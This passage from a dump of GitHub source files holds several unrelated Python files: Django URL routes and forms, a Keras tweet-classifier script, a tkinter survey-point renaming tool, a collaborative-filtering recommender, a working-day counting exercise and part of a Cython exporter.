path('AnaTaskHandle/view/',views.anataskhandle.view),\n path('AnaTaskHandle/modify/',views.anataskhandle.modify),\n path('AnaTaskHandle/qcview/', views.anataskhandle.qcview),\n # 解读师任务操作\n path('JieduTaskHandle/view/', views.jiedutaskhandle.view),# 任务列表\n path('JieduTaskHandle/detailview/', views.jiedutaskhandle.detailview),#任务详细\n path('JieduTaskHandle/download/', views.jiedutaskhandle.download),#下载报告\n path('JieduTaskHandle/upload/', views.jiedutaskhandle.upload),#上传报告\n path('JieduTaskHandle/review/', views.jiedutaskhandle.review),#审核\n # 项目操作\n path('ProjectHandle/init/',views.projecthandle.init), # 添加项目\n path('ProjectHandle/complement/', views.projecthandle.complement), #补充订单\n path('ProjectHandle/complementhelp/', views.projecthandle.complementhelp), #辅助补充订单\n path('ProjectHandle/cmd/', views.projecthandle.cmd), # 项目cmd\n path('ProjectHandle/view/', views.projecthandle.view), # 项目列表\n # 患者操作\n path('PatientHandle/init/', views.patienthandle.init), # 添加患者\n path('PatientHandle/view/', views.patienthandle.view), # 患者列表\n path('PatientHandle/modify/', views.patienthandle.modify), # 患者列表\n path('PatientHandle/addproject/', views.patienthandle.addproject), # 直接下单\n path('PatientHandle/add2project/', views.patienthandle.add2project), # 添加到项目\n path('PatientHandle/batchadd/',views.patienthandle.batchadd), # 批量导入患者\n # 样本管理\n path('SampleHandle/init/', views.samplehandle.init), # 添加样本\n path('SampleHandle/modify/', views.samplehandle.modify), # 完善或者修改样本信息\n path('SampleHandle/view/', views.samplehandle.view), # 样本列表\n path('SampleHandle/upload/', views.samplehandle.upload), # 批量导入样本\n # 实验室管理的任务操作\n path('LabTaskHandle/cmd/', views.labtaskhandle.cmd), # cmd操作,进行,暂停,终止,重置\n path('LabTaskHandle/order/', views.labtaskhandle.order), # 内部下单\n path('LabTaskHandle/view/', views.labtaskhandle.view), # 任务列表\n # 实验管理\n path('ExperimentHandle/view/', views.experimenthandle.view), # 实验列表\n path('ExperimentHandle/cmd/', views.experimenthandle.cmd), # 实验cmd\n\n # 提取管理\n path('ExtractHandle/download/', views.extracthandle.download), # 批量导入数据\n path('ExtractHandle/upload/', views.extracthandle.upload), # 批量导入数据\n path('ExtractHandle/view/', views.extracthandle.view), # 提取结果列表\n # 建库管理\n path('LibraryHandle/view/', views.libraryhandle.view), # 提取结果列表\n path('LibraryHandle/upload/', views.libraryhandle.upload), # 提取结果列表\n path('LibraryHandle/download/', views.libraryhandle.download), # 提取结果列表模板下载\n # 杂交\n path('HybridHandle/view/', views.hybridhandle.view), 
# 提取结果列表\n    path('HybridHandle/upload/', views.hybridhandle.upload),  # 提取结果列表\n    path('HybridHandle/download/', views.hybridhandle.download),  # 提取结果列表模板下载\n    # 质控\n    path('LabQCHandle/view/', views.labqc.view),  # 提取结果列表\n    path('LabQCHandle/upload/', views.labqc.upload),  # 提取结果列表\n    path('LabQCHandle/download/', views.labqc.download),  # 提取结果列表模板下载\n    # 测序\n    path('SeqHandle/view/', views.seqhandle.view),  # 提取结果列表\n    path('SeqHandle/upload/', views.seqhandle.upload),  # 提取结果列表\n    path('SeqHandle/download/', views.seqhandle.download),  # 提取结果列表模板下载\n\n    # 产品操作\n    path('ProductHandle/view/',views.producthandle.view),  # 产品列表\n    path('ProductHandle/add/', views.producthandle.add),  # 添加或修改产品\n    path('ProductHandle/batchadd/', views.producthandle.batchadd),  # 添加或修改产品\n]","repo_name":"Ryanrenqian/yuceInfo","sub_path":"projectmanage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}{"seq_id":"37188153999","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, GRU, Input\nfrom keras.models import Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nfrom nltk.corpus import words, stopwords\nfrom keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport csv\nimport keras\nimport re\nimport random\n\nimport time\nimport string\nfrom contextlib import contextmanager\nimport gc\ngc.collect()\n\n@contextmanager\ndef timer(name):\n\tt0 = time.time()\n\tyield\n\tprint(\"\\n\\n\" + name + ' done in ' + str(round(time.time() - t0)) + 's \\n')\n\n\nprint(\"\\n\\nStarting\\n\\n\")\ncachedStopWords = stopwords.words(\"english\")\nallEnglishWords = words.words()\nallEnglishWords[:] = [x.lower() for x in allEnglishWords]\n\nvocabSize = len(allEnglishWords)\ntokenizer = Tokenizer(num_words=vocabSize)\ntokenised = tokenizer.fit_on_texts(allEnglishWords)\n\n\nclass Judge():\n\tdef __init__(self):\n\t\t# store the network on the instance so Judge().judge works below\n\t\tself.judge = self.createJudgeNetwork()\n\n\tdef createJudgeNetwork(self):\n\t\twith timer(\"Making embedding index dict\"):\n\t\t\tembeddings_index = dict()\n\t\t\tf = open('glove.twitter.27B/glove.twitter.27B.100d.txt', encoding=\"utf8\")\n\t\t\tfor line in f:\n\t\t\t\tvalues = line.split()\n\t\t\t\tword = values[0]\n\t\t\t\tcoefs = np.asarray(values[1:], dtype='float32')\n\t\t\t\tembeddings_index[word] = coefs\n\t\t\tf.close()\n\t\t\tprint('Loaded %s word vectors.' 
% len(embeddings_index))\n\n\n\t\twith timer(\"Making Embedding matrix\"):\n\t\t\tembedding_matrix = np.zeros((vocabSize, 100))\n\t\t\tfor word, index in tokenizer.word_index.items():\n\t\t\t\tif index > vocabSize - 1:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tembedding_vector = embeddings_index.get(word)\n\t\t\t\t\tif embedding_vector is not None:\n\t\t\t\t\t\tembedding_matrix[index] = embedding_vector\n\t\t\t\t\t\t\n\t\twith timer(\"Making JUDGE Model\"):\n\t\t\tmain_input = Input(shape = (180,), dtype = 'int32', name = 'main_input')\n\t\t\tx = Embedding(vocabSize, 100, input_length=180, weights=[embedding_matrix])(main_input)\n\t\t\t# x = Embedding(output_dim=100, input_dim=vocabSize, input_length=180)(main_input)\n\t\t\tlstm_out = LSTM(180)(x)\n\n\t\t\tauxilary_input = Input(shape = (3,), name = 'aux_input')\n\t\t\tx = keras.layers.concatenate([lstm_out, auxilary_input])\n\n\t\t\tx = Dense(64, activation = 'relu')(x)\n\n\t\t\tmain_output = Dense(1, activation = 'sigmoid', name = 'main_output')(x)\n\n\t\t\tmodel = Model(inputs = [main_input, auxilary_input], outputs = [main_output])\n\t\t\tmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', loss_weights=[1], metrics = ['accuracy'])\n\n\t\treturn model\n\n\n\n\t\n\n\njudgeModel = Judge().judge\nprint(\"\\n\\nModel Made : \", judgeModel, \"\\n\\n\")\n\n\ndef clean(s):\n\ttransalator = str.maketrans(\"\", \"\", string.punctuation)\n\treturn s.translate(transalator)\n\ndef preprocess(text):\n\ttext = text.split(\",\")[-1]\n\ttext = clean(text).lower()\n\ttext = text.lower()\n\ttext = ' '.join([word for word in text.split()\n\t\t\t\t\t\tif word not in cachedStopWords])\n\ttext = ' '.join([word for word in text.split() if(not word.startswith(\n\t\t\"@\") and not word.startswith(\"http\") and not word.startswith(\"\\\\\"))])\n\ttext = ' '.join([word for word in text.split()\n\t\t\t\t\t\tif word in allEnglishWords])\n\t#text = re.sub(\"[_]\",\"\",text)\n\t#remove tags\n\ttext = re.sub(\"</?.*?>\", \" <> \", text)\n\t# remove special characters and digits\n\ttext = re.sub(\"(\\\\d|\\\\W)+\", \" \", text)\n\tif(text.startswith(\"rt \") or text.startswith(\" rt\")):\n\t\ttext = text[3:]\n\tif(text == \"rt\"):\n\t\ttext = \"\"\n\twhile(text != \"\" and text[0] == ' '):\n\t\ttext = text[1:]\n\treturn text\n\nwith timer(\"Reading data\"):\n x = []\n y = []\n radical = []\n radicalOne = 0\n with open(\"input.csv\", 'r', encoding=\"utf8\") as csvFile:\n reader = csv.reader(csvFile)\n p = 0\n for row in reader:\n if(p == 0):\n p = p + 1\n continue\n if(len(row) >= 2):\n s = row[0]\n x.append(preprocess(s))\n if(row[2] != '0.0'):\n radicalOne += 1\n if(row[2] != '1.0' and row[2] != '2.0'):\n print(\"Chutiya annotator tha : \", row[2], \" row : \", p)\n radicalOne -= 1\n s = 0\n if(row[2] == '1.0'):\n s = 1\n if(row[2] == '2.0'):\n s = 2\n radical.append(s)\n p = p + 1\n csvFile.close\n\nX = []\nfor t in x:\n t = re.sub(r'[^\\w\\s]', ' ', t)\n t = ' '.join([word for word in t.split() if word != \" \"])\n t = t.lower()\n t = ' '.join([word for word in t.split()\n if word not in cachedStopWords])\n X.append(t)\n\ntokenisedTest = tokenizer.texts_to_sequences(X)\nX_Test = sequence.pad_sequences(\n\ttokenisedTest, maxlen=180, padding='post')\n\n\naux_input = []\noutput = []\n\nfor i in range(0, len(X_Test)):\n\ta = random.randint(1, 100)\n\tb = random.randint(1, 100)\n\n\taux_input.append(a % 2)\n\toutput.append(b % 2)\n\t\n\naux_input = np.array(radical)\n\nprint(\"Auxilary Input = \", aux_input)\nprint(\"Output = \", output)\n\nwith 
timer('Fitting the model'):\n\tepochs = 1\n\tprint(\"epochs : \", epochs)\n\tfitHistory = judgeModel.fit(\n\t\t[X_Test, aux_input], [output], epochs=1, batch_size=200)\n\ttrainingAccuracy = fitHistory.history['acc']\n\twhile(trainingAccuracy[0] < 0.9):\n\t\tepochs += 1\n\t\tprint(\"epochs : \", epochs)\n\t\tfitHistory = judgeModel.fit([X_Test, aux_input], [output], epochs=1, batch_size=200)\n\t\ttrainingAccuracy = fitHistory.history['acc']\n\t\t\n\t\t\n\n\n\n\n","repo_name":"arinjayakhare1/Real-Time-Tweet-Classifier-using-RLAN","sub_path":"test/RLAN Test/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27158394894","text":"\"\"\"\nThis program updates point names of as build surveys from csv files.\nAuthor: Edip Ahmet Taskin\n24/2022\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport sv_ttk\nimport glob\nimport configparser\nimport pandas as pd\nimport geopandas as gpd\nfrom pathlib import Path\n\nconfig = configparser.ConfigParser()\nconfig.read('path.ini')\n\nclass App(ttk.Frame):\n def __init__( self, parent ):\n ttk.Frame.__init__(self)\n # Make the app responsive\n for index in [0, 1, 2]:\n self.columnconfigure(index=index, weight=1)\n self.rowconfigure(index=index, weight=1)\n # Create widgets\n self.setup_widgets()\n\n self.csv_path_input.set(config['path']['csv'])\n self.asbuilt_path_input.set(config['path']['asbuilt'])\n self.output_path_input.set(config['path']['output'])\n\n # Merge csv files: dir_path: csv folder\n def merge_csv( self, dir_path, column_names ):\n # find file name list: find all csv files in the folder\n files = glob.glob( dir_path+\"\\*.csv\", recursive=True )\n # fd_from_each_file is a generator. A generator is a special type of function which does not return a single value,\n # instead, it returns an iterator object with a sequence of values.\n df_from_each_file = (pd.read_csv(f, names=column_names) for f in files)\n # pd.concat merges all dataframe to one datafrome. the all dataframe type is generator.\n df = pd.concat(df_from_each_file, ignore_index=True)\n return df\n\n # Find as build files. Returns a list\n def find_asbuilts( self, dir_path ):\n\t # file_filter is the filter text to find .pts files\n file_filter = dir_path + '\\*.pts'\n # list: finds *.pts files\n files = glob.glob( file_filter, recursive=True )\n return files\n\n # Update the confg file with the new path variables\n def save_config_vars( self ):\n # Update the config parameters\n config.set( 'path', 'csv', self.csv_path.get() )\n config.set( 'path', 'asbuilt', self.asbuilt_path.get() )\n config.set( 'path', 'output', self.output_path.get() )\n # save the new config parameters to path.ini file\n with open('path.ini', 'w') as configfile:\n config.write(configfile)\n \n # returns an asbuilt dataframe. Spatial join asbuilt with merged csv dataframe using inner method. \n def join_dataframe( self, df_csv, df_asbuilt ):\n # create geopandas from dataframe as point layer with Irish CRS. \n # Point type geodataframe: gdf_csv\n gdf_csv = gpd.GeoDataFrame(\n df_csv, geometry=gpd.points_from_xy(df_csv['Easting'], df_csv['Northing']), crs=\"EPSG:2157\")\n # Point type geodataframe: gdf_asbuilt\n gdf_asbuilt = gpd.GeoDataFrame(\n df_asbuilt, geometry=gpd.points_from_xy(df_asbuilt['Easting'], df_asbuilt['Northing']), crs=\"EPSG:2157\")\n # Spatial join asbuilt with merged csv dataframe using inner method. 
\n # An asbuilt data spatially joins with the merged csv dataframe. \n # It compares spatial index from point to point. \n joindef_asbuilt = gdf_asbuilt.sjoin(gdf_csv, how=\"left\")\n return joindef_asbuilt\n\n # This function gets merged csv dataframe. Creates asbuilt dataframe from pts file. \n # Process the asbuilt dataframe with merged dataframe using spatial join. \n # Updates Point_Name column from merged dataframe. Then exports it to a pts file.\n def process_data( self, asbuilt_file ):\n # save config variables when clicking Process button\n self.save_config_vars()\n # column names for both dataframes\n column_names = [\"Point_Name\", \"Easting\", \"Northing\", \"Elevation\", \"Point Code\"]\n # csf folder\n csv_path = self.csv_path.get()\n # merge all csv dataframes to one\n df_csv = self.merge_csv( csv_path, column_names )\n # asbuilt dataframe\n df_asbuilt = pd.read_csv( asbuilt_file, names=column_names, sep='\\t' )\n # extract file name without extention from the file path. It will be used for asbuilt file path\n file_name = Path( asbuilt_file ).stem\n # additional info: export it to gpkg file to see on QGIS\n # joindef_asbuilt.to_file(self.output_path.get() + \"\\\\\" + file_name + \".gpkg\", driver=\"GPKG\")\n joindef_asbuilt = self.join_dataframe( df_csv, df_asbuilt )\n # rename the column names\n joindef_asbuilt.rename(columns = {'Point_Name_right':'Point_Name','Easting_right':'Easting', 'Northing_right':'Northing', 'Elevation_right':'Elevation', 'Point Code_right':'Point_Code'}, inplace = True)\n # select specific columns and copy them to a new dataframe\n joindef_asbuilt = joindef_asbuilt[['Point_Name', 'Easting', 'Northing', 'Elevation', 'Point_Code']].copy()\n # output pts file name\n output_file_name = self.output_path.get() + \"\\\\\" + file_name + \".pts\"\n # Export the dataframe to csv. na_rep=\"\" : Fill the Nan values with spaces, disable index, include header\n joindef_asbuilt.to_csv(output_file_name, sep='\\t', encoding='utf-8', na_rep=\"\", index=False, header=True)\n\n # this function gets all asbuilt pts file paths to a list. 
\n # Then iterates per file to process with process_data(dir_path) function\n def asbuilt_output(self):\n asbuilt_list = self.find_asbuilts( self.asbuilt_path.get() )\n for i in asbuilt_list:\n self.process_data( i )\n\n def folder_path_csv(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.csv_path_input.set(folder)\n\n def folder_path_asbuilt(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.asbuilt_path_input.set(folder)\n\n def folder_path_output(self):\n folder = tk.filedialog.askdirectory()\n if folder:\n self.output_path_input.set(folder)\n\n def setup_widgets(self):\n # pady is vertical space, padx is horizontal space of the widget.\n # Create a Frame for input widgets\n self.widgets_frame = ttk.LabelFrame(self, text=\"Select Folders\", padding=(10, 10, 10, 10))\n self.widgets_frame.grid(\n row=0, column=1, padx=20, pady=(20), sticky=\"nsew\", rowspan=3\n )\n self.widgets_frame.columnconfigure(index=1, weight=1)\n # CSV File Folder\n # Label1\n self.label1 = ttk.Label(self.widgets_frame, text=\"CSV Folder\")\n self.label1.grid(row=1, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text1\n self.csv_path_input = tk.StringVar()\n self.csv_path = ttk.Entry(self.widgets_frame, textvariable=self.csv_path_input, state=tk.DISABLED)\n self.csv_path.grid(row=1, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button1\n self.button1 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_csv)\n self.button1.grid(row=1, column=2, padx=5, pady=10, sticky=\"nsew\")\n # PVS File Folder\n # Label2\n self.label2 = ttk.Label(self.widgets_frame, text=\"As-Built Folder\")\n self.label2.grid(row=2, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text2\n self.asbuilt_path_input = tk.StringVar()\n self.asbuilt_path = ttk.Entry(self.widgets_frame, textvariable=self.asbuilt_path_input, state=tk.DISABLED)\n self.asbuilt_path.grid(row=2, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button2\n self.button2 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_asbuilt)\n self.button2.grid(row=2, column=2, padx=5, pady=10, sticky=\"nsew\")\n # Output Folder\n # Label3\n self.label3 = ttk.Label(self.widgets_frame, text=\"Output Folder\")\n self.label3.grid(row=3, column=0, padx=5, pady=10, sticky=\"nsew\")\n # Readonly text3\n self.output_path_input = tk.StringVar()\n self.output_path = ttk.Entry(self.widgets_frame, textvariable=self.output_path_input, state=tk.DISABLED)\n self.output_path.grid(row=3, column=1, padx=5, pady=10, sticky=\"nsew\")\n # Button3\n self.button3 = ttk.Button(self.widgets_frame, text=\"...\", command=self.folder_path_output)\n self.button3.grid(row=3, column=2, padx=5, pady=10, sticky=\"nsew\")\n # Process Button\n self.button4 = ttk.Button(self.widgets_frame, text=\"Process\", command=self.asbuilt_output)\n self.button4.grid(row=4, column=1, padx=5, pady=10, sticky=\"nsew\")\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n root.title(\"Point Name Fixer\")\n # set the theme\n sv_ttk.set_theme(\"light\")\n app = App(root)\n app.pack(fill=\"both\", expand=True)\n # Set a minsize for the window, and place it in the middle\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n x_cordinate = int((root.winfo_screenwidth() / 2) - (root.winfo_width() / 2))\n y_cordinate = int((root.winfo_screenheight() / 2) - (root.winfo_height() / 2))\n root.geometry(\"+{}+{}\".format(x_cordinate, y_cordinate))\n 
root.mainloop()\n","repo_name":"edips/PointNameFixer","sub_path":"PointNameFixer.py","file_name":"PointNameFixer.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6792498930","text":"import numpy as np\r\nfrom numpy.linalg import norm\r\nimport time\r\n\r\n\r\nclass UserBasedCF(object):\r\n def __init__(self):\r\n self.rec_score = None\r\n self.C_ = None\r\n self.norms_ = None\r\n\r\n def load_result(self, path):\r\n ctime = time.time()\r\n print(\"Loading result...\",)\r\n self.rec_score = np.load(path + \"rec_score.npy\")\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def save_result(self, path):\r\n ctime = time.time()\r\n print(\"Saving result...\",)\r\n np.save(path + \"rec_score\", self.rec_score)\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def pre_compute_rec_scores(self, C):\r\n ctime = time.time()\r\n self.C_ = C\r\n print(\"Training User-based Collaborative Filtering...\",C.shape )\r\n\r\n sim = C.dot(C.T)\r\n norms = np.array([norm(C[i]) for i in range(C.shape[0])])\r\n self.norms_ = norms\r\n sim = sim/(norms.reshape((-1,1)) * norms.reshape((1,-1)))\r\n np.fill_diagonal(sim,0.0)\r\n self.rec_score = sim.dot(C)\r\n print(\"Done. Elapsed time:\", time.time() - ctime, \"s\")\r\n\r\n def predict_user(self, X):\r\n ctime = time.perf_counter()\r\n sim = X.dot(self.C_.T)\r\n print(\"S:\",sim.shape)\r\n norms = np.array([norm(X[i]) for i in range(X.shape[0])])\r\n boo = (norms.reshape((-1,1)) * self.norms_.reshape((1,-1)))\r\n print(boo.shape)\r\n sim = sim/boo\r\n np.fill_diagonal(sim,0.0)\r\n rec_score = sim.dot(self.C_)\r\n print(\"Done. Elapsed time:\", time.perf_counter() - ctime, \"s\",rec_score)\r\n return rec_score\r\n\r\n def predict(self, i, j):\r\n return self.rec_score[i][j]\r\n","repo_name":"SamimaAktar/Where-to-go-spl3","sub_path":"UserBasedCF.py","file_name":"UserBasedCF.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"72357390589","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom web import models\nfrom utils.tencent.cos import delete_bucket\n\n\nclass ProjectDeleteModelForm(forms.ModelForm):\n\n class Meta:\n model = models.Project\n fields = ['name', ]\n\n def __init__(self, request, *args, **kwargs):\n self.request = request\n super().__init__(*args, **kwargs)\n for name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n field.widget.attrs['placeholder'] = f'请输入{field.label}'\n\n def clean_name(self):\n name = self.cleaned_data.get('name')\n if name != self.request.project.name:\n raise ValidationError('请输入本项目的名称')\n project_object = models.Project.objects.filter(name=name, id=self.request.project.id).first()\n if project_object:\n if self.request.tracer == project_object.creator:\n delete_bucket(self.request.project.bucket, self.request.project.region)\n project_object.delete()\n return name\n raise ValidationError('只有项目创建者才可以删除项目')\n raise ValidationError('请输入正确的项目名称')\n","repo_name":"MrXck/SAAS","sub_path":"web/forms/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40467247906","text":"#\nfrom calendar import month\nimport sys\nfrom collections import deque\nfrom bisect import bisect_left\nfrom 
bisect import bisect_right\ndef check_leap_year(year):\n    if year % 400 == 0:\n        return 1\n    if year % 4 == 0 and year % 100 != 0:\n        return 1\n    return 0\n    \ndef cal_days(start_day, end_day):\n    \n    year = [[365,31,28,31,30,31,30,31,31,30,31,30,31],[366,31,29,31,30,31,30,31,31,30,31,30,31]]\n    days = 0\n    \n    start_year, start_month, start_days = start_day\n    end_year, end_month, end_days = end_day\n    \n    \n    if start_year == end_year:  # the joining year and the resignation year are the same\n        month_temp = year[check_leap_year(start_year)]\n        if start_month == end_month:  # the months are the same too\n            days += end_days - start_days + 1\n            return days\n        \n        days += month_temp[start_month] - start_days + 1\n        for m in range(start_month + 1, end_month):\n            days += month_temp[m]\n        days += end_days\n        \n    else:  # the joining year and the resignation year differ\n        # days worked in the first year\n        month_temp = year[check_leap_year(start_year)]\n        days += month_temp[start_month] - start_days + 1\n        for m in range(start_month + 1, 13):\n            days += month_temp[m]\n        \n        # days in the full years in between\n        for y in range(start_year + 1, end_year):\n            days += year[check_leap_year(y)][0]\n        \n        # days worked in the last year\n        month_temp = year[check_leap_year(end_year)]\n        for m in range(1, end_month):\n            days += month_temp[m]\n        days += end_days\n        \n    return days\n\ndef not_weekend_hol(holidays, start_day, end_day, date):\n    holidays.sort()\n    result = 0\n    s_idx = bisect_left(holidays, start_day)\n    e_idx = bisect_right(holidays, end_day)\n\n    holidays = holidays[s_idx:e_idx]\n    \n    for h in holidays:\n        days = cal_days(start_day, h)\n        if date[(days - 1) % 7] == 'SAT' or date[(days - 1) % 7] == 'SUN':\n            continue\n        else:\n            result += 1\n    \n    return result\n\ndef solution(join_date, resign_date, holidays):\n\n    result = 0\n    holidays_list = []\n    \n    date = deque(['MON','TUE', 'WED','THU','FRI','SAT','SUN'])\n    temp = deque([])\n    \n    join_date_day, join_date_date = map(str, join_date.split())\n    join_date_day = list(map(int, join_date_day.split('/')))\n    resign_date_day = list(map(int,resign_date.split('/')))\n\n    # public holidays\n    for y in range(join_date_day[0], resign_date_day[0] + 1):\n        for h in holidays:\n            h_month, h_day = map(int, h.split('/'))\n            holidays_list.append([y,h_month,h_day])\n    \n    # rotate the weekday deque so it starts on the joining weekday\n    while join_date_date != date[0]:\n        temp_date = date.popleft()\n        temp.append(temp_date)\n    \n    while temp:\n        temp_date = temp.popleft()\n        date.append(temp_date)\n    date = list(date)\n    \n    total_days = cal_days(join_date_day,resign_date_day)\n\n    sun_or_sat_days = (total_days-1) // 7 * 2\n    cnt = 0\n    if 'SAT' in date[:(total_days - 1) % 7 + 1]:\n        cnt += 1\n    if 'SUN' in date[:(total_days - 1) % 7 + 1]:\n        cnt += 1\n    \n    total_holidays = not_weekend_hol(holidays_list, join_date_day, resign_date_day,date)\n    \n    return total_days - sun_or_sat_days - total_holidays - cnt\n    \n    \nif __name__ == '__main__':\n    join_date = ['2020/1/5 TUE','2019/12/01 SUN', '2019/12/01 SUN', '2019/11/21 THU']\n    resign_date = ['2024/03/20','2019/12/31', '2020/03/02','2019/11/21']\n    holidays = [['5/5', '12/25', '3/1'],['12/25'],['01/02','12/24','03/01'],['12/23']]\n    for p,r,h in zip(join_date, resign_date, holidays):\n        print(solution(p,r,h))","repo_name":"Cho-El/coding-test-practice","sub_path":"프로그래머스 문제/파이썬/2022 쿠키런서버개발자인턴/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21690367217","text":"from typing import Union, Iterable\n\nimport cv2\nimport numpy as np\n\nfrom mpa.utils.logger import get_logger\n\nlogger = get_logger()\n\n\ndef get_cls_img_indices(labels, dataset):\n    img_indices = {label.name: list() for label in 
labels}\n for i, item in enumerate(dataset):\n item_labels = item.annotation_scene.get_labels()\n for i_l in item_labels:\n img_indices[i_l.name].append(i)\n\n return img_indices\n\n\ndef get_old_new_img_indices(labels, new_classes, dataset):\n ids_old, ids_new = [], []\n _dataset_label_schema_map = {label.name: label for label in labels}\n new_classes = [_dataset_label_schema_map[new_class] for new_class in new_classes]\n for i, item in enumerate(dataset):\n if item.annotation_scene.contains_any(new_classes):\n ids_new.append(i)\n else:\n ids_old.append(i)\n return {'old': ids_old, 'new': ids_new}\n\n\ndef get_actmap(saliency_map: Union[np.ndarray, Iterable, int, float], \n output_res: Union[tuple, list]):\n saliency_map = cv2.resize(saliency_map, output_res)\n saliency_map = cv2.applyColorMap(saliency_map, cv2.COLORMAP_JET)\n saliency_map = cv2.cvtColor(saliency_map, cv2.COLOR_BGR2RGB)\n return saliency_map\n","repo_name":"mhasa004/training_extensions","sub_path":"external/model-preparation-algorithm/mpa_tasks/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"36650745734","text":"import warnings\nfrom functools import partial\nfrom itertools import chain\nfrom abc import ABCMeta, abstractmethod\n\nfrom . import templates\nfrom .ast import Constructor\nfrom .parser import Includes, TypeInfo\nfrom .defaultconfig import Config\nfrom .template_specialization import (ClassSpecializer, FunctionSpecializer,\n MethodSpecializer)\nfrom .templates import render\nfrom .type_conversion import create_type_converter\nfrom .utils import from_camel_case, replace_keyword_argnames\n\n\nclass AstExporter(object):\n \"\"\"Base class of AST exporters.\n\n An AST exporter converts elements of an AST to a single string. 
This\n is an implementation of the visitor pattern to avoid duplication in the\n code that walks through the AST.\n \"\"\"\n __metaclass__ = ABCMeta\n def __init__(self):\n self.typedefs = []\n self.enums = []\n self.functions = []\n self.classes = []\n self.arguments = []\n self._clear_class()\n\n self.output = None\n\n def _clear_class(self):\n \"\"\"Set collected class members to empty list.\"\"\"\n self.fields = []\n self.ctors = []\n self.methods = []\n\n def export(self):\n \"\"\"Export generated string.\n\n Returns\n -------\n output : str\n Generated output\n \"\"\"\n return self.output\n\n @abstractmethod\n def visit_ast(self, ast):\n \"\"\"Visit AST.\n\n Parameters\n ----------\n ast : AST\n Abstract syntax tree\n \"\"\"\n\n @abstractmethod\n def visit_enum(self, enum):\n \"\"\"Visit enum.\n\n Parameters\n ----------\n enum : Enum\n Enumeration\n \"\"\"\n\n @abstractmethod\n def visit_typedef(self, typedef):\n \"\"\"Visit typedef.\n\n Parameters\n ----------\n typedef : Typedef\n Type definition\n \"\"\"\n\n @abstractmethod\n def visit_clazz(self, clazz):\n \"\"\"Visit class.\n\n Parameters\n ----------\n clazz : Clazz\n Custom class\n \"\"\"\n\n @abstractmethod\n def visit_field(self, field):\n \"\"\"Visit field.\n\n Parameters\n ----------\n field : Field\n Field, data member of a class\n \"\"\"\n\n @abstractmethod\n def visit_constructor(self, ctor):\n \"\"\"Visit constructor.\n\n Parameters\n ----------\n ctor : Constructor\n Class constructor\n \"\"\"\n\n @abstractmethod\n def visit_template_class(self, template_class):\n \"\"\"Visit template class.\n\n Parameters\n ----------\n template_class : TemplateClass\n Template class\n \"\"\"\n\n @abstractmethod\n def visit_method(self, method):\n \"\"\"Visit method.\n\n Parameters\n ----------\n method : Method\n Visit class method\n \"\"\"\n\n @abstractmethod\n def visit_template_method(self, template_method):\n \"\"\"Visit template method.\n\n Parameters\n ----------\n template_method : TemplateMethod\n Template method that defines its own template type(s)\n \"\"\"\n\n @abstractmethod\n def visit_function(self, function):\n \"\"\"Visit function.\n\n Parameters\n ----------\n function : Function\n Function that does not belong to a class\n \"\"\"\n\n @abstractmethod\n def visit_template_function(self, template_function):\n \"\"\"Visit template function.\n\n Parameters\n ----------\n template_function : TemplateFunction\n Template function\n \"\"\"\n\n @abstractmethod\n def visit_param(self, param):\n \"\"\"Visit function parameter.\n\n Parameters\n ----------\n param : Param\n A parameter of a constructor, method, or function\n \"\"\"\n\n\nclass CythonDeclarationExporter(AstExporter):\n \"\"\"Export to Cython declaration file (.pxd).\n\n Parameters\n ----------\n includes : Includes, optional\n Collects information about required import statements from the exporter\n\n config : Config, optional\n Configuration that controls e.g. 
